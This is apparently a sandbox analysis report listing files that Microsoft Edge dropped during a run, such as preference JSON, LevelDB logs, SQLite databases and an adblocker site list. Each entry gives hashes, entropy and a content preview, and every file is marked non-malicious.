                                                                                                                                                                                                                                                                                    SHA-512:5D7A5BD4307298901BE844DF9063A198861C52D05E3C06D6C5AC8C3D4253CD3E42B3D045B74E369F65D322322CBAE77AFC2F7088901A7CFDF966B4095D0E7222
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):107893
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.640173185101434
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7R:fwUQC5VwBIiElEd2K57P7R
                                                                                                                                                                                                                                                                                    MD5:68DDA50FDB9AF6E86F170412111C6190
                                                                                                                                                                                                                                                                                    SHA1:B3171ED37DBCB85AA186B62063672E4E3A218DFE
                                                                                                                                                                                                                                                                                    SHA-256:56E97854FDFA5C5ADFBAA13F061961DDF48BD400882520B4E886CA79A1EC4D65
                                                                                                                                                                                                                                                                                    SHA-512:71A8FA2B6FB152BCD0FEAB5FC0F21F8B0CC112FEE14D0992E34BB49A86A3AFFDFFB7DA8FB20B75AD0ED28D75EA296ED65726252984B4666190CF12E22719DEF8
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):4194304
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.4353163477645988
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3072:ZREKu9KcOWSdQq6Dm1vkcAcKnflb/BDpgJiqUfJBq0x/V2eg1HFul:YKuQ3UDmpkcAZfl/R2JyfJBqwV2eaHE
                                                                                                                                                                                                                                                                                    MD5:96E56C382D1B76B6CB6D990B527C646B
                                                                                                                                                                                                                                                                                    SHA1:421A6A9F09A68A0792340E4A63DEE19C07C6DC8B
                                                                                                                                                                                                                                                                                    SHA-256:23F16D77FF6E108ED804FC2F6BF6C21F6A3268EA9AA5AE8D0C0D00CBFD41E20E
                                                                                                                                                                                                                                                                                    SHA-512:31996169700974D5CD174AAE7015254D1E012DC8F517637E67C0F4508D23E208512A09D75B5F8B7DFC744C200BBAE880AD5DB7A42D2791A3E5190CFFAC2AA583
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...@..@...@.....C.].....@................T...T..............`... ...i.y.........BrowserMetrics......i.y..Yd. .......A...................v.0.....UV&K.k<................UV&K.k<................UMA.PersistentHistograms.InitResult.....8...i.y.[".................................................i.y.Pq.30..............117.0.2045.47-64..".en-GB*...Windows NT..10.0.190452l..x86_64..?........".yabwnk20,1(.0..8..B.......2.:.M..BU..Be...?j...GenuineIntel... .. ..........x86_64...J....k..^o..J..l.zL.^o..J....\.^o..J.....f.^o..J....?.^o..P.Z...b.INBXj....... .8.@..............(......................w..U?:K...G...W6.>.........."....."...24.."."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="*.:............B)..1.3.177.11.. .*.RegKeyNotFound2.windowsR...Z...u...V.S@..$...SF@.......Y@.......4@.......Y@........?........?.........................Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......Y@.......4@.......Y@................Y@.......Y@.......Y@........?........?2.........m...... .2........
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):280
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.132041621771752
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5x1:o1ApdeaEqYsMazlYBVsJDu2ziy5
                                                                                                                                                                                                                                                                                    MD5:845CFA59D6B52BD2E8C24AC83A335C66
                                                                                                                                                                                                                                                                                    SHA1:6882BB1CE71EB14CEF73413EFC591ACF84C63C75
                                                                                                                                                                                                                                                                                    SHA-256:29645C274865D963D30413284B36CC13D7472E3CD2250152DEE468EC9DA3586F
                                                                                                                                                                                                                                                                                    SHA-512:8E0E7E8CCDC8340F68DB31F519E1006FA7B99593A0C1A2425571DAF71807FBBD4527A211030162C9CE9E0584C8C418B5346C2888BEDC43950BF651FD1D40575E
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:sdPC......................X..<EE..r/y..."pZLhTaJ23hN5uQxwzu0K2CYes/dvJuE93VbIVV/LnRA="..................................................................................47DEQpj8HBSa+/TImW+5JCeuQeRkm5NMpJWZG3hSuFU=....................fdb35e9f-12f5-40d5-8d50-87a9333d43a4............
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):1
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                    MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                    SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                    SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                    SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):25012
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.567446526186164
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:c64Tl7WPl1fwH8F1+UoAYDCx9Tuqh0VfUC9xbog/OV8JYSLrwHqpVtuu:c64Tl7WPl1fwHu1jadeSAstB
                                                                                                                                                                                                                                                                                    MD5:F669505FCC3009C42D05E9A02BD3ABC6
                                                                                                                                                                                                                                                                                    SHA1:46E91F55009D6AD03AE9CDC1DE4C19B8D1F14DA9
                                                                                                                                                                                                                                                                                    SHA-256:5F47D70862C4CF14B3A66990964568E1AC77E79DB07C68D11F1021B7557CBE83
                                                                                                                                                                                                                                                                                    SHA-512:28748644903D7720E9189DB86E06ACDAEC4FA6FCA08B97F795B47C78D9ADE822BBC4FC32DCA9BCA3F7C42F403993CDD0623253E0E90B398B8B1A80AE488BFDCD
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:JSON data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):40504
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.561061268744564
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:768:cvGTbN7pLGLhp7WPl1fFH8F1+UoAYDCx9Tuqh0VfUC9xbog/OVnoKJY5Lrw+Gxcm:cvGTb7chp7WPl1fFHu1jaOoKe5A+Gx8U
                                                                                                                                                                                                                                                                                    MD5:99EC0ED681633C22395DF0FAECA9B8C8
                                                                                                                                                                                                                                                                                    SHA1:5C19DD748F04C37BAB7667FDE610C75D62DF18F7
                                                                                                                                                                                                                                                                                    SHA-256:48C5C8503A31F422426305BC45EFC4BDA870B371FDF38541793CD92C9E8A027F
                                                                                                                                                                                                                                                                                    SHA-512:5F890B754B3621672EFE359500E9721AC365E97309989E9D681D0AC3C3C5E03EC19768207513CFAA655ABAA017B1A58284C54985AB72C6999BD3D6D525BEB585
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13379780831720600","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13379780831720600","location":5,"ma
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):115717
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                    MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                    SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                    SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                    SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):33
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                    MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                    SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                    SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                    SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):16
                                                                                                                                                                                                                                                                                    Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                    MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                    SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                    SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                    SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):307
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.239840152279541
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQVIgHM1923oH+Tcwtp3hBtB2KLlguLcjIq2P923oH+Tcwtp3hBWsIFUv:iyhYebp3dFLauLxv4Yebp3eFUv
                                                                                                                                                                                                                                                                                    MD5:A0D850A501C1674BC6A96EC8175B198C
                                                                                                                                                                                                                                                                                    SHA1:B57C555FEA867FFC068B64EF87A8D1A2C7E3F1D2
                                                                                                                                                                                                                                                                                    SHA-256:868F2F6FF26B506172D2C328B1F0B3661D2D0379D1100AC871F9EFA08862A3B3
                                                                                                                                                                                                                                                                                    SHA-512:2FE3B21FC8B2FEFE9B022938415144AC16164FB7410411FE979A3802D5BAE464FF18114387741A17595BF22687A51EFC165047891B1D91A8E36DF5C96DBD59A3
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.905 ff4 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db since it was missing..2024/12/27-08:47:17.005 ff4 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\AdPlatform/auto_show_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):41
                                                                                                                                                                                                                                                                                    Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                    MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                    SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                    SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                    SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:data
                                                                                                                                                                                                                                                                                    Category:modified
                                                                                                                                                                                                                                                                                    Size (bytes):2163821
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.222867489346783
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24576:v+/PN8FffI/MXhZSihQgCmnVAEpENU2iOYcafbE2n:v+/PN8tfx2mjF
                                                                                                                                                                                                                                                                                    MD5:16043C38E88882D86BE71702F90DD53F
                                                                                                                                                                                                                                                                                    SHA1:E8EF0CB4D0C1829DFEA7037AE8DC32E18EBCC998
                                                                                                                                                                                                                                                                                    SHA-256:30E06B7FA45776438B257A0C2C420FC4ABDAD4A6A7C520DDB071F2810B78EC1D
                                                                                                                                                                                                                                                                                    SHA-512:16A25BB12867816D8A017225EA81729E370F792EA434BF506954F4C0A3D90ED1BF1268CA7D6891C00916F011391F027333D6CA33BC7C6C478A393DFC259F3E41
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:...m.................DB_VERSION.1.l.i.................QUERY_TIMESTAMP:arbitration_priority_list4.*.*.13340900604462938.$QUERY:arbitration_priority_list4.*.*..[{"name":"arbitration_priority_list","url":"https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?sv=2017-07-29&sr=c&sig=NtPyTqjbjPElpw2mWa%2FwOk1no4JFJEK8%2BwO4xQdDJO4%3D&st=2021-01-01T00%3A00%3A00Z&se=2023-12-30T00%3A00%3A00Z&sp=r&assetgroup=ArbitrationService","version":{"major":4,"minor":0,"patch":5},"hash":"N0MkrPHaUyfTgQSPaiVpHemLMcVgqoPh/xUYLZyXayg=","size":11749}]...................'ASSET_VERSION:arbitration_priority_list.4.0.5..ASSET:arbitration_priority_list.[{. "configVersion": 32,. "PrivilegedExperiences": [. "ShorelinePrivilegedExperienceID",. "SHOPPING_AUTO_SHOW_COUPONS_CHECKOUT",. "SHOPPING_AUTO_SHOW_LOWER_PRICE_FOUND",. "SHOPPING_AUTO_SHOW_BING_SEARCH",. "SHOPPING_AUTO_SHOW_REBATES",. "SHOPPING_AUTO_SHOW_REBATES_CONFIRMATION",. "SHOPPING_AUTO_SHOW_REBATES_DEACTI
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):336
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.167666127854885
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:iQXoR+q2P923oH+Tcwt9Eh1tIFUt8dQXNAZmw+dQWVkwO923oH+Tcwt9Eh15LJ:iC5v4Yeb9Eh16FUt8dCNA/+dZ5LYeb9O
                                                                                                                                                                                                                                                                                    MD5:E44B026F1437D09282607308D0DCFDC8
                                                                                                                                                                                                                                                                                    SHA1:E0960B9EB36187483023AE2CF70B563F435C6516
                                                                                                                                                                                                                                                                                    SHA-256:40AB781F8039528345F8825A484A41374E4E1F155240AC0B056DB604BB2ED53D
                                                                                                                                                                                                                                                                                    SHA-512:927CA492938453BB39932CA3035D6028063EF727057713321994A4B575795C27E38B5102F401344BBCE56338CDCAE734E44A884375B68C02083E961464FB2722
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:2024/12/27-08:47:16.924 1c18 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/MANIFEST-000001.2024/12/27-08:47:16.926 1c18 Recovering log #3.2024/12/27-08:47:16.931 1c18 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Asset Store\assets.db/000003.log .
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):28672
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.46306724907951013
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:24:TLi5YFQq3qh7z3WMYziciNW9WkZ96UwOfBu53UL:TouQq3qh7z3bY2LNW9WMcUvBuBa
                                                                                                                                                                                                                                                                                    MD5:144094C0D6BE72C76193B2D422DED66D
                                                                                                                                                                                                                                                                                    SHA1:AF6A78510A9615BA2A7F6D92FE7BBD98CD41339B
                                                                                                                                                                                                                                                                                    SHA-256:4AD94D0464D993C930C73DCA86C5B962D853716F18A7F4BB2FAB78A4F8A9EA45
                                                                                                                                                                                                                                                                                    SHA-512:90A3EEDE7D68442726A0091FEC6DE67FFBA1C5DC618DB1D24958E5DBC26FC1EBAD09A96DCF932C5C8017FD9B0ADFE049324477CDE558723821FEF1B08645E579
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j..........g.....8...n................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):10240
                                                                                                                                                                                                                                                                                    Entropy (8bit):0.8708334089814068
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:12:LBtW4mqsmvEFUU30dZV3lY7+YNbr1dj3BzA2ycFUxOUDaazMvbKGxiTUwZ79GV:LLaqEt30J2NbDjfy6UOYMvbKGxjgm
                                                                                                                                                                                                                                                                                    MD5:92F9F7F28AB4823C874D79EDF2F582DE
                                                                                                                                                                                                                                                                                    SHA1:2D4F1B04C314C79D76B7FF3F50056ECA517C338B
                                                                                                                                                                                                                                                                                    SHA-256:6318FCD9A092D1F5B30EBD9FB6AEC30B1AEBD241DC15FE1EEED3B501571DA3C7
                                                                                                                                                                                                                                                                                    SHA-512:86FEF0E05F871A166C3FAB123B0A4B95870DCCECBE20B767AF4BDFD99653184BBBFE4CE1EDF17208B7700C969B65B8166EE264287B613641E7FDD55A6C09E6D4
                                                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                                                    Preview:SQLite format 3......@ ..........................................................................j...v... .. .....M....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                                                    Size (bytes):348
                                                                                                                                                                                                                                                                                    Entropy (8bit):5.189112330006538
                                                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                                                    SSDEEP:6:ioLtDN+q2P923oH+TcwtnG2tMsIFUt8doL6IZZmw+doLRKVkwO923oH+TcwtnG2b:iCDIv4Yebn9GFUt8doZ/+d/5LYebn95J
                                                                                                                                                                                                                                                                                    MD5:EBE61D24F89365B0BB6957EF81F6CFB6
                                                                                                                                                                                                                                                                                    SHA1:5D1CAA8B6BA2A894DABCBEA03944C1C8286E3ED2
                                                                                                                                                                                                                                                                                    SHA-256:64377E47BE2F0A4EDFDFDD4ADCAD5021767B8E5F659E3FB3A97CAFFC663833D3
                                                                                                                                                                                                                                                                                    SHA-512:49C19DEBFC3F1D55F567B8B0D4598569057A23EDC69A4C4225BAD1CD60430B140C91968599B65EFE68ADC8A37C0C6A3B81681549AAD5B42738BFAA6443611D49
                                                                                                                                                                                                                                                                                    Malicious:false
